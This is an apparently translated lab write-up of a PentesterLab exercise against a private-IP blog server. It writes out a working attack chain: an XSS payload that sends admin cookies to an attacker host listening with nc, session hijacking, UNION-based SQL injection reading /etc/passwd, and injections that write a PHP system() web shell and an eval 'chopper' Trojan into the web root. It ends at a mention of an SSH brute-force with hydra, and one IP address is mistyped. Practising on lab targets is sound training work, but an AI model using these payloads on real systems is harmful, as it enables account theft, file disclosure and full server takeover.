Please refer to the sql injection target machine attack process
https://pentesterlab.com/exercises/from_sqli_to_shell/course
http://www.sohu.com/a/126855490_472906
Please refer to the attack process of xss target drone
https://pentesterlab.com/exercises/xss_and_mysql_file/course
Open the webpage on the 192.168.165.129 machine:
is a blog system.
Below each blog title can be rated:
Test whether there is an xss vulnerability.
It is found that there is a pop-up box after submitting:
further structure the content
<script>document.write('<img src="http://192.168.179.142/?'+document.cookie+' "/>');</script>
At the same time, open port 80 with nc on the 192.168.165.1298 machine .
Log in to the admin account on the original machine, the password is p4ssw0rd
Log in to view the comment thread just posted.
Then check the return content of nc.
Get cookie information.
Copy the cookie and open the page where the comment is located. And modify the value of the cookie to the value just copied.
Refresh the next page and find that you have logged into the page as admin.
After entering the management interface, it is found that there is a sql injection vulnerability in the blog editing interface.
http://192.168.165.129/admin/edit.php ?id=4 union select 1,2,3,4
Findings 2 and 3 can be displayed.
http://192.168.165.129/admin/edit.php ?id=0 union select 1,2,load_file("/etc/passwd"),4
The passwd file can be read, but the shadow file cannot be read. Let's try if we can create a file.
On the edit page, I found that there is an error message in the /var/www/classes directory,
When viewing the source code, I found that there is a css directory
After trying it out, the /var/www/css directory is writable.
So construct the statement:
http://192.168.165.129/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22
then open
http://192.168.165.129/css/s.php
show:
It means that the s.php file is successfully written to the /var/www/css directory, and the following will
<?php system($_GET['c']); ?>
Write in z.php and construct the url as:
http://192.168.165.129/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22
Access z.php and use uname -a to get system information. Commands can be executed remotely.
Write a sentence Trojan horse below to construct the url:
http://192.168.165.129/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
Knife link:
I found that the machine had ssh turned on before, so I blasted it with hydra:
ssh login